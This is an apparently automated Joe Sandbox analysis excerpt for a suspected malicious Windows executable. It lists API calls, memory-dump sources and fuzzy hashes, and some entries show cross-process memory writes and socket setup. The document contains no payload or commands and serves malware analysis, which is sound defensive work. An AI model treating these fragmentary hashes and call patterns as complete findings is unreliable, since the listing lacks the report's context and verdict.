                                                                      • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0091CE0F
                                                                    • _free.LIBCMT ref: 0091CE22
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0091CE31
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    APIs
                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
                                                                    • SelectObject.GDI32(?,00000000), ref: 008F96A2
                                                                    • BeginPath.GDI32(?), ref: 008F96B9
                                                                    • SelectObject.GDI32(?,00000000), ref: 008F96E2
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    • String ID:
                                                                    • API String ID: 3225163088-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6), ref: 00912DFD
                                                                    • _free.LIBCMT ref: 00912E32
                                                                    • _free.LIBCMT ref: 00912E59
                                                                    • SetLastError.KERNEL32(00000000,008E1129), ref: 00912E66
                                                                    • SetLastError.KERNEL32(00000000,008E1129), ref: 00912E6F
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?,?,0094035E), ref: 0094002B
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940046
                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940054
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?), ref: 00940064
                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940070
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0094E997
                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 0094E9A5
                                                                    • Sleep.KERNEL32(00000000), ref: 0094E9AD
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0094E9B7
                                                                    • Sleep.KERNEL32 ref: 0094E9F3
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 842720411-0
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00940FCA
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00940FD6
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00940FE5
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00940FEC
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00941002
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: ca85b77050feb5228ab05040ce64152c46affd6301037309646a520e9634cd98
                                                                    • Instruction ID: e7d01d534c846caee412c99bf48947b763ae9d983ce9903fa4080c7e4c346a49
                                                                    • Opcode Fuzzy Hash: ca85b77050feb5228ab05040ce64152c46affd6301037309646a520e9634cd98
                                                                    • Instruction Fuzzy Hash: AAF06DB6214301EBDB214FA4EC4DF563FADEF89762F504428FA49D7261CA70DC809A60
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0094102A
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00941036
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941045
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0094104C
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941062
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 0526d5b865e0f7ca91364b8d56c48d4956a15b882582acc7370e38ae72f99848
                                                                    • Instruction ID: 845ccc00898175af95d6fcc694a3bc34dcc834dc8c12411eb1bc6339fbf3fc6a
                                                                    • Opcode Fuzzy Hash: 0526d5b865e0f7ca91364b8d56c48d4956a15b882582acc7370e38ae72f99848
                                                                    • Instruction Fuzzy Hash: 22F06DB6214301EBDB215FA4EC49F563BADEF89761F100428FA49D7250CA70D8909A60
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950324
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950331
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 0095033E
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 0095034B
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950358
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950365
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: c04de8c8e2adf7f28af8dcea626165b70e5ec8f42d91d86613a8c86b1f5e835a
                                                                    • Instruction ID: 2ceb5a422ff7c3d032fe594fda05a4a2b93cb980ba97cec1c53c83533914205d
                                                                    • Opcode Fuzzy Hash: c04de8c8e2adf7f28af8dcea626165b70e5ec8f42d91d86613a8c86b1f5e835a
                                                                    • Instruction Fuzzy Hash: DC01AE72800B15DFCB30AF66D880812FBF9BFA03163158A3FD19652931C3B1A998DF80
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0091D752
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • _free.LIBCMT ref: 0091D764
                                                                    • _free.LIBCMT ref: 0091D776
                                                                    • _free.LIBCMT ref: 0091D788
                                                                    • _free.LIBCMT ref: 0091D79A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 57c80ad64519f1f325c331dfd196f2fb1b6b6343fa623c6867d2f3cbde04462c
                                                                    • Instruction ID: f680bdb2b7392eaf05f09c818a31605aacf63cf8a313925b7ecf0395d928e8a8
                                                                    • Opcode Fuzzy Hash: 57c80ad64519f1f325c331dfd196f2fb1b6b6343fa623c6867d2f3cbde04462c
                                                                    • Instruction Fuzzy Hash: 86F04FB271520CAB8625FB6CFAC5D9677DDBF85720B940805F058DB541CB24FCD086A0
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00945C58
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00945C6F
                                                                    • MessageBeep.USER32(00000000), ref: 00945C87
                                                                    • KillTimer.USER32(?,0000040A), ref: 00945CA3
                                                                    • EndDialog.USER32(?,00000001), ref: 00945CBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: b25c437a7d42f40e2c02104e599d48b265ceb44214b8e76b1cb463dfa4cd0942
                                                                    • Instruction ID: 4b4b32fc6dec7802c8c9f2545416b56f409d9b97f2d527805383b63d1fae3909
                                                                    • Opcode Fuzzy Hash: b25c437a7d42f40e2c02104e599d48b265ceb44214b8e76b1cb463dfa4cd0942
                                                                    • Instruction Fuzzy Hash: 88018171514B04ABEB315B50DDCEFA67BB8BB00B06F01065DA587A10E2DBF4A9849B91
                                                                    APIs
                                                                    • _free.LIBCMT ref: 009122BE
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • _free.LIBCMT ref: 009122D0
                                                                    • _free.LIBCMT ref: 009122E3
                                                                    • _free.LIBCMT ref: 009122F4
                                                                    • _free.LIBCMT ref: 00912305
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 404891bbf46c184d92088de19240ef68918ab9c5fe3e7624ba6743c37f0335e1
                                                                    • Instruction ID: 68bea41e04053ae7569400429ae437f282db00b8d11a60131578e28380d114b8
                                                                    • Opcode Fuzzy Hash: 404891bbf46c184d92088de19240ef68918ab9c5fe3e7624ba6743c37f0335e1
                                                                    • Instruction Fuzzy Hash: A9F03AB1A282248BC616BF58BE019AD3FA4FB59771740070AF430DA2B1C73548B1BBE4
                                                                    APIs
                                                                    • EndPath.GDI32(?), ref: 008F95D4
                                                                    • StrokeAndFillPath.GDI32(?,?,009371F7,00000000,?,?,?), ref: 008F95F0
                                                                    • SelectObject.GDI32(?,00000000), ref: 008F9603
                                                                    • DeleteObject.GDI32 ref: 008F9616
                                                                    • StrokePath.GDI32(?), ref: 008F9631
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                    • String ID:
                                                                    • API String ID: 2625713937-0
                                                                    • Opcode ID: 3797950b9472eb6d56d34c3a47183b21e495b1d1edeecbcb82e7ab96b0ddc230
                                                                    • Instruction ID: 676f406da0c2c9281bffe247fc9731387b58e432043e1f151bb74756a719bbd0
                                                                    • Opcode Fuzzy Hash: 3797950b9472eb6d56d34c3a47183b21e495b1d1edeecbcb82e7ab96b0ddc230
                                                                    • Instruction Fuzzy Hash: CDF0193102D248EBDB225F65EE287A43B65FB11376F548318F569950F0C7348991EF60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$_free
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 3432400110-3206640213
                                                                    • Opcode ID: 15ca09828b272925f98998eb687bd8018f88a2ebf4ef50a0a96fd1410ee454a7
                                                                    • Instruction ID: e34787312a8f83ce7f66e36d1297a9aa0abd4b6dd557678a4723a6e4106e3de3
                                                                    • Opcode Fuzzy Hash: 15ca09828b272925f98998eb687bd8018f88a2ebf4ef50a0a96fd1410ee454a7
                                                                    • Instruction Fuzzy Hash: 9CD1E131B0420EFADB289F68C845BFAB7B9EF05300F284559E7219B654D3799DC2CB91
                                                                    APIs
                                                                      • Part of subcall function 00900242: EnterCriticalSection.KERNEL32(009B070C,009B1884,?,?,008F198B,009B2518,?,?,?,008E12F9,00000000), ref: 0090024D
                                                                      • Part of subcall function 00900242: LeaveCriticalSection.KERNEL32(009B070C,?,008F198B,009B2518,?,?,?,008E12F9,00000000), ref: 0090028A
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 009000A3: __onexit.LIBCMT ref: 009000A9
                                                                    • __Init_thread_footer.LIBCMT ref: 00967BFB
                                                                      • Part of subcall function 009001F8: EnterCriticalSection.KERNEL32(009B070C,?,?,008F8747,009B2514), ref: 00900202
                                                                      • Part of subcall function 009001F8: LeaveCriticalSection.KERNEL32(009B070C,?,008F8747,009B2514), ref: 00900235
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                                    • API String ID: 535116098-3733170431
                                                                    • Opcode ID: a81b86d43daa2ca41c98fcbfe2b3936e376d41299e4a59ca4ff9e31091792c3d
                                                                    • Instruction ID: 05daefdea16bbd658461f8a1bf3f753f836e3474a36151c573604fb53ee8a55b
                                                                    • Opcode Fuzzy Hash: a81b86d43daa2ca41c98fcbfe2b3936e376d41299e4a59ca4ff9e31091792c3d
                                                                    • Instruction Fuzzy Hash: A491AC70A04208EFCB14EF98C991DBDB7B5FF89308F108459F8469B292DB75AE41CB51
                                                                    APIs
                                                                      • Part of subcall function 0094B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009421D0,?,?,00000034,00000800,?,00000034), ref: 0094B42D
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00942760
                                                                      • Part of subcall function 0094B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009421FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0094B3F8
                                                                      • Part of subcall function 0094B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0094B355
                                                                      • Part of subcall function 0094B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00942194,00000034,?,?,00001004,00000000,00000000), ref: 0094B365
                                                                      • Part of subcall function 0094B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00942194,00000034,?,?,00001004,00000000,00000000), ref: 0094B37B
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009427CD
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0094281A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 3e1503ba381c506eb713d236356bcff0746655636dc43d6b4a0320812ddc6d61
                                                                    • Instruction ID: e6e7ab810fcea78c653cb92e05509a8e269e3452d550b5b290b59aa38b24d868
                                                                    • Opcode Fuzzy Hash: 3e1503ba381c506eb713d236356bcff0746655636dc43d6b4a0320812ddc6d61
                                                                    • Instruction Fuzzy Hash: EF410C72901218AEDB10DFA4C985FEEBBB8AF45700F104099FA55B7191DB70AE85CB61
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3HnH4uJtE7.exe,00000104), ref: 00911769
                                                                    • _free.LIBCMT ref: 00911834
                                                                    • _free.LIBCMT ref: 0091183E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Users\user\Desktop\3HnH4uJtE7.exe
                                                                    • API String ID: 2506810119-1666211088
                                                                    • Opcode ID: 4eb249cbb6f88367414cb571223020698da193d01848f0fe34ea41711dff6a37
                                                                    • Instruction ID: 3df2ea220abb2945e825f007b7815390c7665d701efedd2ca5b58a51819e7361
                                                                    • Opcode Fuzzy Hash: 4eb249cbb6f88367414cb571223020698da193d01848f0fe34ea41711dff6a37
                                                                    • Instruction Fuzzy Hash: AA318E71B0421CBFDB21DF999981EDEBBFCEB85320B5041A6F91497251D6708E80DB90
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0094C306
                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 0094C34C
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009B1990,00BB5748), ref: 0094C395
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem
                                                                    • String ID: 0
                                                                    • API String ID: 135850232-4108050209
                                                                    • Opcode ID: 5927d0474dcb6b95bb4fe496040508c4c4d5485e5f6f0b7c7c3bd3fc4f8c552f
                                                                    • Instruction ID: 24b1ffb55821fd2237094797f486913d7ddd482b1fb6df4cfa4ce9587f82889f
                                                                    • Opcode Fuzzy Hash: 5927d0474dcb6b95bb4fe496040508c4c4d5485e5f6f0b7c7c3bd3fc4f8c552f
                                                                    • Instruction Fuzzy Hash: 0741C3B22093019FD720DF25D844F1ABBE8EF85711F008A1DF9A5972D1D770E904CB62
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0097CC08,00000000,?,?,?,?), ref: 009744AA
                                                                    • GetWindowLongW.USER32 ref: 009744C7
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009744D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: df5f5b4666d1d4a68a3329a2074314080f2db72e0f152c967e7bf7a00478dcb0
                                                                    • Instruction ID: 08d2b3f34708a84ba2e9513359b158b8be7ab94b61b10f0c2b8e3194061db798
                                                                    • Opcode Fuzzy Hash: df5f5b4666d1d4a68a3329a2074314080f2db72e0f152c967e7bf7a00478dcb0
                                                                    • Instruction Fuzzy Hash: EF318F72214605AFDF218E38DC45BEA77A9EB49334F208715F979D21E1DB70EC90AB50
                                                                    APIs
                                                                      • Part of subcall function 0096335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00963077,?,?), ref: 00963378
                                                                    • inet_addr.WSOCK32(?), ref: 0096307A
                                                                    • _wcslen.LIBCMT ref: 0096309B
                                                                    • htons.WSOCK32(00000000), ref: 00963106
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
